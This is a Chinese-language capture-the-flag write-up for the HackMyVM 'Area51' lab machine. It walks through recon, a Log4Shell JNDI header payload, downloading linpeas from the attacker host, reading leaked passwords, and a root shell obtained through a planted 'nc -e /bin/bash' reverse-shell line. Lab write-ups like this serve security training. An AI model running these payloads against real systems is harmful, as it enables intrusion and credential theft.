记一次对Hackmyvm-Area51靶机的渗透测试

举报
亿人安全 发表于 2023/05/31 13:10:33 2023/05/31
【摘要】 靶机信息靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51名称:Area51(51区)难度:中等创作者:bit发布日期:2021-12-24目标:user.txt和root.txt搭建靶机下载完Area51.ova后,使用Oracle VM VirtualBox导入即可导入时注意!!不要勾上USB控制器,不然会出错导入完成后,直接启...

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51

名称:Area51(51区)

难度:中等

创作者:bit

发布日期:2021-12-24

目标:user.txt和root.txt

搭建靶机

下载完Area51.ova后,使用Oracle VM VirtualBox导入即可

图片

导入时注意!!不要勾上USB控制器,不然会出错

图片

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMwareKali192.168.2.148
目标机:VirtualBoxDebianIP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.2.0/24

图片

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.2.108

图片

扫描到22(SSH)、80(HTTP)、8080(HTTP)三个端口,使用火狐浏览器访问80端口,192.168.2.108

好家伙佛波乐(FBI)页面,访问下8080端口,192.168.2.108:8080

图片

发现是一个400报错页面

图片

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt

图片

扫描到一个note.txt,访问下192.168.2.108/note.txt

图片

翻译看看

图片

渗透测试

提示存在Log4j漏洞,猜测到很有可能跟8080端口有关,直接访问,使用Burp的插件log4j扫描看看

图片

发现X-Api-Version:参数存在漏洞

存在log4j漏洞,使用poc(https://github.com/kozmer/log4j-shell-poc)拿shell

在kali机器中,log4j-shell-poc目录下必须有jdk1.8.0_20文件夹的java

(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)

git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
python3 poc.py --userip 192.168.2.148

图片

新开一个终端页面开启监听

nc -nvlp 9001

再新开一个终端页面,输入刚刚的payload

curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'

监听这边的终端就收到了

图片

发现是在docker里面,上传一个linpeas.sh搜集下信息

kali机器下载好linpeas.sh,新开一个终端页面开启远程下载服务

python3 -m http.server 7788

监听这边的终端页面执行下载linpeas.sh

wget http://192.168.2.148:7788/linpeas.sh

图片

执行linpeas.sh信息收集

chmod +x linpeas.sh
./linpeas.sh

发现一些目录查看下

图片

cat /var/tmp/.roger,查询到roger的密码
使用ssh远程登录
ssh roger@192.168.2.108

图片

拿到user.txt下的一个FLAG=[xxxxxx]

继续使用linpeas.sh搜集信息

wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

图片

发现了roger下有个kang

cat /etc/pam.d/kang,发现是kang的密码
su kang

图片

发现kang的主目录发生了一些奇怪的事情,一个文件不断出现并消失

看起来像是kang用户创建了一个shell脚本,执行所有的.sh文件并删除它们

echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

图片

新开一个终端页面开启监听

nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt

图片

成功获取到root权限下的FLAG=[xxxxx]

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。